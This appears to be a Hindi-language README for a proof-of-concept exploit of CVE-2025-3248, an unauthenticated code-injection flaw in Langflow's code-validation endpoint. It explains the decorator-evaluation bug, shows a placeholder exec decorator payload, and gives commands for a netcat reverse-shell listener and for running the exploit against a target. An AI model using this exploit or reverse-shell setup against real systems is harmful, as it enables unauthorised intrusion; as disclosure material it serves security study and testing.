
CVE-2025-3248 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow में एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता है, जो /api/v1/validate/code एंडपॉइंट के माध्यम से कोड इंजेक्शन का प्रदर्शन करता है।
CVE-2025-3248 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow में एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता है, जो एक AI/LLM वर्कफ़्लो-निर्माण प्लेटफ़ॉर्म है।
Langflow एक एंडपॉइंट, POST /api/v1/validate/code उजागर करता है, जिसका उद्देश्य UI द्वारा सबमिट किए गए Python कोड के स्निपेट को "मान्य" करना है (जैसे कस्टम कंपोनेंट कोड)। आंतरिक रूप से यह ast.parse() / compile() के साथ कोड को पार्स और कंपाइल करता है और रिपोर्ट करता है कि यह मान्य है या नहीं — बिना किसी प्रमाणीकरण की आवश्यकता के।
बग: Python डेकोरेटर एक्सप्रेशन को पार्स/कंपाइल समय पर मूल्यांकन करता है, डेकोरेटेड फ़ंक्शन को कभी कॉल किए जाने से पहले। यदि सबमिट किया गया "मान्य करने के लिए कोड" में ऐसा डेकोरेटर होता है:
@exec("...malicious code...")
def test():
pass
तो exec(...) कॉल उसी क्षण चलता है जब कोड पार्स किया जाता है — मान्यता को वास्तव में test() को कॉल करने की कभी आवश्यकता नहीं होती। कोई प्रमाणीकरण नहीं और कोई सैंडबॉक्सिंग नहीं होने के साथ, Langflow चलाने वाले होस्ट पर मनमाने कमांड निष्पादित करने के लिए एक अनप्रमाणित HTTP अनुरोध पर्याप्त है।
nc -lvnp 9001
python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]
pip install requests
यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण (लैब्स, CTFs, स्पष्ट लिखित अनुमति वाले अभियान) के लिए प्रदान किया गया है। इसे उन सिस्टमों के विरुद्ध न चलाएँ जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण नहीं है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।